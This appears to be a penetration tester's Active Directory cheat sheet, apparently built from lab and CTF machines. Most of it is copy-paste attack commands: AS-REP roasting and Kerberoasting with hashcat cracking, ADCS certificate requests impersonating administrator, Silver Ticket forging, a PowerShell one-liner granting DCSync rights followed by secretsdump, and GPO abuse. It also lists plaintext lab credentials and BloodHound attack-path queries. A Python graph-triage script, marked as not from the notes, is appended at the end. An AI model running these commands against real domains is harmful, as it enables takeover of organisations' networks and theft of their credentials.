AD Enumeration & Exploits

AD Quick Hits

  • check locally running services
  • if an AD obj has genericwrite on another user object: targeted kerberoast (see AD Enumeration)
  • if you have a service account's password, you can potentially create a Silver Ticket (see AD Exploits)
  • if the target user has write/modify permission over the default group policy/main GPO: GPO abuse (see AD Exploits)

AD Enumeration

As-Rep (remote; requires DC reachability)

Methodology:

  • No user list
  • User list
  • Authenticated

No user list / single user:

impacket-GetNPUsers domain.name/user -request -no-pass

User list (userfile: format the contents, no \n):

impacket-GetNPUsers -usersfile users.txt domain.name/ -no-pass -request

Authenticated (check with userlist, valid creds):

impacket-GetNPUsers htb.local/ -request

On target (access required):

.\Rubeus asreproast /nowrap

Crack TGT:

hashcat -m 18200 -a 0 user.asrep.txt /usr/share/wordlists/rockyou.txt  --force

note: if you cannot crack the TGT you probably won't be able to pass it

Kerberoast

hint: requires domain access or creds! Always try std kerberoast.

Std kerberoast (remote):

impacket-GetUserSPNs -request -dc-ip $trgtdc domain.name/user

Make sure to use single quotes (around the password).

On target:

.\Rubeus kerberoast /nowrap

Crack TGS:

hashcat -m 13100 -a 0 user.kerbi.txt /usr/share/wordlists/rockyou.txt  --force

Targeted kerberoast (remote)

TIP: if an AD obj has genericwrite on another user object

targetedKerberoast.py -v -d 'target-domain.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40

Make sure to use single quotes.

Service account SPN lookup:

windapsearch -m user-spns -d nagoya-industries.com -u <user> -p <pwd>
ldapsearch -x -H ldap://$trgt1 -b "dc=nagoya-industries,dc=com" "(samAccountName=svc_mssql)" -D  svc_mssql -w Service1 | grep -i service

TIP: if you have a service account's password, you can potentially create a Silver Ticket. See AD Exploits section.

ADCS vuln check (remote)

TIP: requires valid AD credentials only!

1. Identify vulnerable templates:

crackmapexec ldap  $trgt1 -u ryan.cooper -p NuclearMosquito3 -M adcs
certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable

Check with a creds list (do if required...):

for l in $(cat creds.txt); do u=$(echo $l | cut -d ':' -f1); p=$(echo $l | cut -d ':' -f2); echo -e "SEARCHING AS USER: $u\n" && certipy-ad find -u $u -p $p -target $trgt1 -text -stdout -vulnerable; done

creds format:

user1:pass1
user2:pass2

Review permissions:

  • enrollment
  • Object control

2. Request a certificate for the target UPN:

certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
certipy-ad req -u <username> -p <password> -target $trgt1 -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication

3. Authenticate with the certificate (ntlm hash):

certipy-ad auth -pfx administrator.pfx

AD Exploits

Silver Ticket Exploit

1. Gather:

  • NT HASH
  • USER SPN
  • DOMAIN SID

AD SID:

(Get-ADDomain).DomainSID.Value
rpcclient -U craig.carr --password Spring2023 nagoya-industries.com -c lsaquery

User properties (SPN etc.):

([adsisearcher]"samaccountname=<user>").findall().properties

2. Forge the ticket (impacket):

impacket-ticketer -nthash <user_hash>  -domain-sid <sid> -domain <domain.name> -spn <SVC/spn_name> -user-id <500 Administrator>

3. Use the ticket:

export KRB5CCNAME=$PWD/Administrator.ccache

4. Modify /etc/krb5user.conf accordingly. Change the realms as needed. See examples below:

[libdefaults]
    default_realm = OFFSEC.COM
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
    fcc-mit-ticketflags = true

[realms]
OFFSEC.COM = {
kdc = dc01.offsec.com
#admin_server = dc01.offsec.com
}

[domain_realm]
.offsec.com = OFFSEC.COM

[libdefaults]
default_realm = NAGOYA-INDUSTRIES.COM
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
dns_canonicalize_hostname = false
fcc-mit-ticketflags = true

[realms]
NAGOYA-INDUSTRIES.COM = {
kdc = nagoya.nagoya-industries.com
# admin_server = nagoya.nagoya-industries.com
}

[domain_realm]
.nagoya-industries.com = NAGOYA-INDUSTRIES.COM

update /etc/hosts if required

Use the kerberos option to authenticate to the service, e.g.:

impacket-mssqlclient -k <server>.<domain.com>

DCSync

DCSync Exploit (powerview), on target:

. .\powerview.ps1
$SecPass = ConvertTo-SecureString 'Passw0rd' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\aslam', $SecPass)
Add-ObjectACL -PrincipalIdentity aslam -Credential $Cred -Rights DCSync

Add target user to the WriteDACL group first if required:

net group 'target_group' <user> /add
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

As oneliner:

net group 'Exchange Windows Permissions' svc-alfresco /add; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

Extract hashes, on attacker (impacket):

impacket-secretsdump 'aslam:Passw0rd@10.129.229.91' -just-dc-user Administrator -just-dc-ntlm

aclpwn, on attacker:

aclpwn -f svc-alfresco -t htb.local --domain htb.local --server 10.10.10.161

GPO abuse

TIP: if the target user has write/modify permission over the default group policy/main GPO

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <username> --GPOName "Default Domain Policy"

Do if required...:

gpupdate /force

Bloodhound Analysis

Collection, remote (creds required):

bloodhound-python -u <username> -p <pwd> -ns $trgt1 -d <domain.name> -c All

If the local clock is out of sync with the DC, wrap the collector in faketime:

faketime "$(ntpdate -q htb.lab | cut -d ' ' -f 1,2)" bloodhound-python -u svc-alfresco -p s3rvice -ns $trgt1 -d htb.local -c All

Collection, on target (access required):

powershell -ep bypass
. .\sharphound.ps1
Invoke-BloodHound -CollectionMethods All -OutputDirectory C:\Users\Public\

Transfer files out (See 'Exfil files to Attacker' section)

Analysis:

sudo neo4j start    (neo4j:password)
bloodhound

Import the results zip file into the Bloodhound GUI.

Built-in queries to review:

  • Review Default Domain Policy - Inbound Control Rights
  • Find Workstations where Domain Users can RDP
  • Find Servers where Domain Users can RDP
  • Find Computers where Domain Users are Local Admin
  • Shortest Path to Domain Admins from Owned Principals

Review permissions:

  • enrollment
  • Object control

Manual review:

  • Search for the domain and see what objects have control over it
  • Search for the owned users and look for "Object control", "group" etc.

Custom queries:

List all computers

MATCH (m:Computer) RETURN m

List all users

MATCH (u:User) RETURN u

List all active user sessions on machines

MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

note: if a SID is displayed, a local Administrator session is indicated by RID 500 (last segment of the SID)

List users and group relations

MATCH p = (c:User)-[:MemberOf]->(m:Group) RETURN p

Find machines Domain Users can RDP into

match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' return p

Find what groups can RDP

MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p

Find groups that can reset passwords (Warning: Heavy)

MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p

Find groups that have local admin rights (Warning: Heavy)

MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p

Find all users that have local admin rights

MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p

Find all active Domain Admin sessions

MATCH (n:User)-[:MemberOf]->(g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = (c:Computer)-[:HasSession]->(n) return p

Find if unprivileged users have rights to add members into groups

MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-[r:AddMember*1..]->(m:Group)) RETURN p

Find an object in one domain that can do something to a foreign object

MATCH p=(n)-[r]->(m) WHERE NOT n.domain = m.domain RETURN p

Find kerberoastable users with a path to DA

MATCH (u:User {hasspn:true}) MATCH (g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = shortestPath( (u)-[*1..]->(g) ) RETURN p

List the groups of all owned users

MATCH (m:User) WHERE m.owned=TRUE WITH m MATCH p=(m)-[:MemberOf*1..]->(n:Group) RETURN p
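The custom Cypher queries above can also be reproduced offline for triage. As an added example (not from these notes), a small pure-Python walk over a constructed BloodHound-style node/edge set implements two of them, "kerberoastable users with a path to DA" and the RID 500 session check, so findings can be prioritised for remediation without a neo4j instance. All node and edge data is constructed, and the edge names mirror those used in the queries.

```python
from collections import deque
# Constructed sample graph in BloodHound's shape (not real data); RID 512 = Domain Admins, hasspn = kerberoastable.
NODES = {
    "SVC_SQL@CORP.LOCAL": {"type": "User", "hasspn": True, "objectid": "S-1-5-21-1-2-3-1105"},
    "ALICE@CORP.LOCAL": {"type": "User", "hasspn": False, "objectid": "S-1-5-21-1-2-3-1106"},
    "ADMINISTRATOR@CORP.LOCAL": {"type": "User", "hasspn": False, "objectid": "S-1-5-21-1-2-3-500"},
    "SQLADMINS@CORP.LOCAL": {"type": "Group", "objectid": "S-1-5-21-1-2-3-2001"},
    "DOMAIN ADMINS@CORP.LOCAL": {"type": "Group", "objectid": "S-1-5-21-1-2-3-512"},
    "SQL01.CORP.LOCAL": {"type": "Computer", "objectid": "S-1-5-21-1-2-3-1201"},
}
# Directed (source, edge, target) triples with the same edge names the Cypher queries use.
EDGES = [
    ("SVC_SQL@CORP.LOCAL", "MemberOf", "SQLADMINS@CORP.LOCAL"),
    ("ALICE@CORP.LOCAL", "MemberOf", "SQLADMINS@CORP.LOCAL"),
    ("SQLADMINS@CORP.LOCAL", "AdminTo", "SQL01.CORP.LOCAL"),
    ("SQL01.CORP.LOCAL", "HasSession", "ADMINISTRATOR@CORP.LOCAL"),
    ("ADMINISTRATOR@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
]

def rid(objectid):
    """Last segment of a SID: 500 is the built-in Administrator, 512 is Domain Admins."""
    return int(objectid.rsplit("-", 1)[1])

def shortest_path(src, dst, edges=EDGES):
    """BFS over directed edges; returns one shortest node path or None (like Cypher shortestPath)."""
    prev, queue = {src: None}, deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for s, _, t in edges:
            if s == node and t not in prev:
                prev[t] = node
                queue.append(t)
    return None

def kerberoastable_with_path_to_da(nodes=NODES, edges=EDGES):
    """'Kerberoastable users with a path to DA': hasspn users that can reach the RID-512 group."""
    da = next(n for n, p in nodes.items() if p["type"] == "Group" and rid(p["objectid"]) == 512)
    spn_users = [n for n, p in nodes.items() if p["type"] == "User" and p.get("hasspn")]
    paths = {n: shortest_path(n, da, edges) for n in spn_users}
    return {n: path for n, path in paths.items() if path}  # ALICE has a path but no SPN, so is excluded

def rid500_sessions(nodes=NODES, edges=EDGES):
    """Computers holding a built-in Administrator (RID 500) session, per the note above."""
    return sorted(c for c, e, u in edges if e == "HasSession" and rid(nodes[u]["objectid"]) == 500)
```

Swapping NODES and EDGES for the users/groups/computers and relationships exported from a real collection turns this into a quick offline check of which SPN accounts and Administrator sessions to clean up first.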